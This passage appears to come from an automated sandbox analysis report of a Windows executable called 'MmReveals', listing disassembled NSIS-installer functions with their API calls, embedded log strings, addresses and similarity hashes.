                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                          • String ID: @rD$New install of "%s" to "%s"${
                          • API String ID: 2110491804-2409696222
                          • Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                          • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                          • Opcode Fuzzy Hash: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                          • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                          APIs
                          • GetDlgItem.USER32(?,000003F9), ref: 00404993
                          • GetDlgItem.USER32(?,00000408), ref: 004049A0
                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                          • LoadBitmapW.USER32(0000006E), ref: 00404A02
                          • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                          • DeleteObject.GDI32(?), ref: 00404A79
                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                          • ShowWindow.USER32(?,00000005), ref: 00404BCF
                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                          • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                          • GlobalFree.KERNEL32(?), ref: 00404DAC
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                          • ShowWindow.USER32(?,00000000), ref: 00404F49
                          • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                          • ShowWindow.USER32(00000000), ref: 00404F5B
                          Similarity
                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                          • String ID: $ @$M$N
                          • API String ID: 1638840714-3479655940
                          • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                          • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                          • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                          • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                          APIs
                          • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                          • GetDlgItem.USER32(?,000003FB), ref: 00404527
                          • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                          • GetDlgItem.USER32(?,000003F0), ref: 00404543
                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                          • SetWindowTextW.USER32(?,?), ref: 00404583
                          • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                          • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                          • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                          • CoTaskMemFree.OLE32(00000000), ref: 00404648
                            • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                            • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000), ref: 00403E8F
                          • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                          • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                          Similarity
                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                          • String ID: 82D$@%F$@rD$A
                          • API String ID: 3347642858-1086125096
                          • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                          • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                          • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                          • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                          • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                          • CloseHandle.KERNEL32(?), ref: 004071E6
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          Similarity
                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                          • API String ID: 1916479912-1189179171
                          • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                          • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                          • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                          • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                          APIs
                          • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                          • lstrcatW.KERNEL32(0045C918,\*.*), ref: 00406D09
                          • lstrcatW.KERNEL32(?,00408838), ref: 00406D29
                          • lstrlenW.KERNEL32(?), ref: 00406D2C
                          • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                          • FindClose.KERNEL32(?), ref: 00406E33
                          Strings
                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                          • Delete: DeleteFile("%s"), xrefs: 00406DBC
                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                          • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                          • \*.*, xrefs: 00406D03
                          Similarity
                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                          • API String ID: 2035342205-3294556389
                          • Opcode ID: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                          • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                          • Opcode Fuzzy Hash: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                          • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                          APIs
                          • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                          • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                          • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                          • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                          • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                          Similarity
                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                          • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                          • API String ID: 3581403547-784952888
                          • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                          • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                          • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                          • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                          APIs
                          • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                          Strings
                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                          Similarity
                          • API ID: CreateInstance
                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                          • API String ID: 542301482-1377821865
                          • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                          • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                          • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                          • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                          Similarity
                          • API ID: FileFindFirst
                          • String ID:
                          • API String ID: 1974802433-0
                          • Opcode ID: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                          • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                          • Opcode Fuzzy Hash: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                          • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                          APIs
                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                          • lstrlenW.KERNEL32(?), ref: 004063CC
                          • GetVersionExW.KERNEL32(?), ref: 0040642A
                            • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                          • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                          • GlobalFree.KERNEL32(?), ref: 004064DD
                          Similarity
                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                          • API String ID: 20674999-2124804629
                          • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                          • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                          • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                          • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                          • ShowWindow.USER32(?), ref: 004054D2
                          • DestroyWindow.USER32 ref: 004054E6
                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                          • GetDlgItem.USER32(?,?), ref: 00405523
                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                          • IsWindowEnabled.USER32(00000000), ref: 0040553E
                          • GetDlgItem.USER32(?,00000001), ref: 004055ED
                          • GetDlgItem.USER32(?,00000002), ref: 004055F7
                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                          • GetDlgItem.USER32(?,00000003), ref: 00405708
                          • ShowWindow.USER32(00000000,?), ref: 0040572A
                          • EnableWindow.USER32(?,?), ref: 0040573C
                          • EnableWindow.USER32(?,?), ref: 00405757
                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                          • EnableMenuItem.USER32(00000000), ref: 00405774
                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                          • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                          • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                          • ShowWindow.USER32(?,0000000A), ref: 00405910
                          Similarity
                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                          • String ID: @rD
                          • API String ID: 184305955-3814967855
                          • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                          • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                          • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                          • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                          APIs
                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                          • GetDlgItem.USER32(?,000003E8), ref: 00404181
                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                          • GetSysColor.USER32(?), ref: 004041AF
                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                          • lstrlenW.KERNEL32(?), ref: 004041D6
                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                            • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                          • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                          • SendMessageW.USER32(00000000), ref: 00404251
                          • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                          • SetCursor.USER32(00000000), ref: 004042D2
                          • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                          • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                          • SetCursor.USER32(00000000), ref: 004042F6
                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                          • String ID: @%F$N$open
                          • API String ID: 3928313111-3849437375
                          • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                          • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                          • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                          • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                          APIs
                          • lstrcpyW.KERNEL32(0045B2C8,NUL), ref: 00406AA9
                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                          • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                          • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                          • wsprintfA.USER32 ref: 00406B4D
                          • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                          • GlobalFree.KERNEL32(00000000), ref: 00406C52
                          • CloseHandle.KERNEL32(?), ref: 00406C5C
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                          • String ID: F$%s=%s$NUL$[Rename]
                          • API String ID: 565278875-1653569448
                          • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                          • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                          • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                          • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                          APIs
                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                          • BeginPaint.USER32(?,?), ref: 00401047
                          • GetClientRect.USER32(?,?), ref: 0040105B
                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                          • DeleteObject.GDI32(?), ref: 004010F6
                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                          • SelectObject.GDI32(00000000,?), ref: 00401149
                          • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                          • DeleteObject.GDI32(?), ref: 0040116E
                          • EndPaint.USER32(?,?), ref: 00401177
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                          • String ID: F
                          • API String ID: 941294808-1304234792
                          • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                          • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                          • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                          • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                          APIs
                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                          • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                          • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          Strings
                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                           • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: lstrlen$CloseCreateValuewvsprintf
                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                          • API String ID: 1641139501-220328614
                          • Opcode ID: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                          • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                          • Opcode Fuzzy Hash: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                          • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                          APIs
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                          Strings
                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                          Memory Dump Source
